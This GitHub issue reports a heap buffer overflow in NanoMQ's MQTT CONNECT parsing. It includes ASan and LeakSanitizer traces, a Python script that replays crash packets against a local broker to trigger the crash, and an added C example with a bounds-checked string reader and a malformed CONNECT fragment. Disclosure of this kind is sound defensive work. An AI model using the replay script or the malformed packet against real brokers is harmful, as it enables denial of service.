
[Bug] Heap-based Buffer Overflow in mqtt_parser.c - copyn_utf8_str() #1043

Closed
realsung opened this issue Feb 8, 2023 · 1 comment

realsung commented Feb 8, 2023

Describe the bug
Heap overflow occurred in the copyn_utf8_str function of mqtt_parser.c. Confirmed with AddressSanitizer.

Expected behavior
A clear and concise description of what you expected to happen.

Actual Behavior
Heap Overflow (CWE-122)

To Reproduce

ASan log:

=================================================================
==104416==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000014a22 at pc 0x561da5470f06 bp 0x7f29911f39b0 sp 0x7f29911f39a0
READ of size 1 at 0x603000014a22 thread T12
    #0 0x561da5470f05 in copyn_utf8_str /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:225
    #1 0x561da547454d in conn_handler /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:711
    #2 0x561da5557a51 in tcptran_pipe_nego_cb /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:349
    #3 0x561da5456a2f in nni_taskq_thread /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:50
    #4 0x561da5457de7 in nni_thr_wrap /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:94
    #5 0x561da5460f9c in nni_plat_thr_main /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:266
    #6 0x7f299a31eb42 in start_thread nptl/pthread_create.c:442
    #7 0x7f299a3b09ff  (/lib/x86_64-linux-gnu/libc.so.6+0x1269ff)

0x603000014a22 is located 0 bytes to the right of 18-byte region [0x603000014a10,0x603000014a22)
allocated by thread T13 here:
    #0 0x7f299a58a867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x561da545c604 in nni_alloc /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_alloc.c:20
    #2 0x561da542b76b in nng_alloc /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/nng.c:60
    #3 0x561da5557765 in tcptran_pipe_nego_cb /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:331
    #4 0x561da5456a2f in nni_taskq_thread /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:50
    #5 0x561da5457de7 in nni_thr_wrap /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:94
    #6 0x561da5460f9c in nni_plat_thr_main /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:266
    #7 0x7f299a31eb42 in start_thread nptl/pthread_create.c:442

Thread T12 created by T0 here:
    #0 0x7f299a52e685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x561da54610cc in nni_plat_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:279
    #2 0x561da5458093 in nni_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:121
    #3 0x561da5456d51 in nni_taskq_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:95
    #4 0x561da5457ab1 in nni_taskq_sys_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:294
    #5 0x561da5441a57 in nni_init_helper /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:35
    #6 0x561da5461471 in nni_plat_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:422
    #7 0x561da5441ad8 in nni_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:58
    #8 0x561da548585c in nni_proto_mqtt_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol.c:37
    #9 0x561da5481c00 in nng_nmq_tcp0_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:1258
    #10 0x561da5426744 in broker /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:865
    #11 0x561da542ac72 in broker_start /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:1592
    #12 0x561da53f53bf in main /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/nanomq.c:142
    #13 0x7f299a2b3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

Thread T13 created by T0 here:
    #0 0x7f299a52e685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x561da54610cc in nni_plat_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:279
    #2 0x561da5458093 in nni_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:121
    #3 0x561da5456d51 in nni_taskq_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:95
    #4 0x561da5457ab1 in nni_taskq_sys_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:294
    #5 0x561da5441a57 in nni_init_helper /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:35
    #6 0x561da5461471 in nni_plat_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:422
    #7 0x561da5441ad8 in nni_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:58
    #8 0x561da548585c in nni_proto_mqtt_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol.c:37
    #9 0x561da5481c00 in nng_nmq_tcp0_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:1258
    #10 0x561da5426744 in broker /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:865
    #11 0x561da542ac72 in broker_start /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:1592
    #12 0x561da53f53bf in main /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/nanomq.c:142
    #13 0x7f299a2b3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:225 in copyn_utf8_str
==104416==ABORTING

import socket
import sys
import time


def check_input(data, sleep_time=0.01):
    """Send one raw packet to the local broker.

    Returns True when the packet was delivered and False when the connection
    was refused, i.e. the broker is no longer listening because it crashed.
    A reset connection is retried with a fresh socket.
    """
    delivered = False
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(('127.0.0.1', 1883))
            s.sendall(data)
            delivered = True
            break
        except ConnectionResetError:
            continue
        except ConnectionRefusedError:
            break
        finally:
            s.close()

    time.sleep(sleep_time)
    return delivered


def check_crash_log(crash_log):
    # Replay the logged packets newest first; stop at the first one after
    # which the broker no longer accepts connections.
    for c in reversed(crash_log):
        c_bytes = bytearray.fromhex(c.strip())
        status = check_input(c_bytes, 0.25)
        if status is False:
            print('[+] A crash was detected')
            return c_bytes
    print('[-] No crash..')
    sys.exit(1)


with open('target-1675833483.502341.txt', 'r') as f:
    crash_log = f.readlines()

check_crash_log(crash_log)

Target file: target-1675833483.502341.txt

Environment Details

  • NanoMQ version : v0.15.0-0
  • Operating system and version : Linux lab-virtual-machine 5.15.0-58-generic x86_64 x86_64 x86_64 GNU/Linux
  • Compiler and language used : I am using the ASAN build option with the Ninja build.
  • Testing scenario : Run the broker (ASan build) with the ./nanomq start command, put the target file and the Python file in the same path, and run the Python script.

Client SDK
Using MQTT Raw Packet

Additional context

@JaylinYu JaylinYu self-assigned this Feb 11, 2023
@JaylinYu JaylinYu added the bug label Feb 11, 2023
JaylinYu added a commit to nanomq/NanoNNG that referenced this issue Feb 11, 2023
JaylinYu added a commit to nanomq/NanoNNG that referenced this issue Feb 13, 2023
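The report above is a one-byte read immediately past an 18-byte heap region while a UTF-8 string is being copied. As an added example (not NanoMQ's or NanoNNG's code), the reader below shows the check such a copy needs: the 2-byte length prefix of an MQTT UTF-8 string is compared against the bytes actually left in the packet before anything is read. The CONNECT fragments are constructed here and assume the standard MQTT v3.1.1 layout; they are not the reporter's target file.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { UTF8_OK = 0, UTF8_ERR_TRUNCATED = -1, UTF8_ERR_NOMEM = -2 };

/* Read one MQTT UTF-8 encoded string (2-byte big-endian length, then that many
 * bytes) at buf[*pos]. On success *out is a NUL-terminated copy the caller
 * frees, *out_len is the declared length and *pos is advanced past the string.
 * The declared length is checked against the bytes remaining in buf before a
 * single byte is read, so an overstated length field cannot walk off the end
 * of the heap allocation that holds the packet. */
int mqtt_read_utf8_str(const uint8_t *buf, size_t buf_len, size_t *pos,
                       char **out, uint16_t *out_len)
{
    size_t p = *pos;
    if (p > buf_len || buf_len - p < 2)      /* no room for the length prefix */
        return UTF8_ERR_TRUNCATED;
    uint16_t len = (uint16_t)((buf[p] << 8) | buf[p + 1]);
    p += 2;
    if (buf_len - p < len)                   /* length field exceeds remaining bytes */
        return UTF8_ERR_TRUNCATED;
    char *s = malloc((size_t)len + 1);
    if (s == NULL) return UTF8_ERR_NOMEM;
    memcpy(s, buf + p, len);
    s[len] = '\0';
    *out = s; *out_len = len; *pos = p + len;
    return UTF8_OK;
}

/* Constructed 18-byte CONNECT fragments: 10-byte variable header ("MQTT",
 * level 4, connect flags, keep alive) followed by the client id. kBadConnect
 * declares a 16-byte client id although only 6 bytes follow; kGoodConnect
 * declares the honest 6. */
const uint8_t kBadConnect[18]  = { 0x00, 0x04, 'M', 'Q', 'T', 'T', 0x04, 0x02,
                                   0x00, 0x3c, 0x00, 0x10, 'c', 'l', 'i', 'e', 'n', 't' };
const uint8_t kGoodConnect[18] = { 0x00, 0x04, 'M', 'Q', 'T', 'T', 0x04, 0x02,
                                   0x00, 0x3c, 0x00, 0x06, 'c', 'l', 'i', 'e', 'n', 't' };

/* Copy the client id of a CONNECT fragment into id; returns UTF8_OK or an error. */
int read_client_id(const uint8_t *buf, size_t len, char *id, size_t cap)
{
    size_t pos = 10;                         /* client id follows the variable header */
    char *s = NULL; uint16_t slen = 0;
    int rc = mqtt_read_utf8_str(buf, len, &pos, &s, &slen);
    if (rc != UTF8_OK) return rc;
    snprintf(id, cap, "%s", s);
    free(s);
    return UTF8_OK;
}
```

A parser built this way rejects the malformed packet with UTF8_ERR_TRUNCATED instead of reading past the allocation, which is the condition ASan flagged in the report.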
@JaylinYu (Member)

==88333==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecfb348d4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:766
#4 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#5 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#6 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#7 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecf80390a in nano_pipe_start /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:616
#4 0x564ecf7cdc88 in nni_listener_add_pipe /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/socket.c:1601
#5 0x564ecf7be3c1 in listener_accept_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/listener.c:357
#6 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#7 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#8 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#9 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecfb33fa4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:670
#4 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#5 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#6 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#7 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 66 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecfb33fa4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:670
#5 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#6 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#7 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#8 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecfb348d4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:766
#5 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#6 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#7 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#8 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecf80390a in nano_pipe_start /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:616
#5 0x564ecf7cdc88 in nni_listener_add_pipe /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/socket.c:1601
#6 0x564ecf7be3c1 in listener_accept_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/listener.c:357
#7 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#8 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#9 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#10 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

SUMMARY: AddressSanitizer: 698 byte(s) leaked in 6 allocation(s).
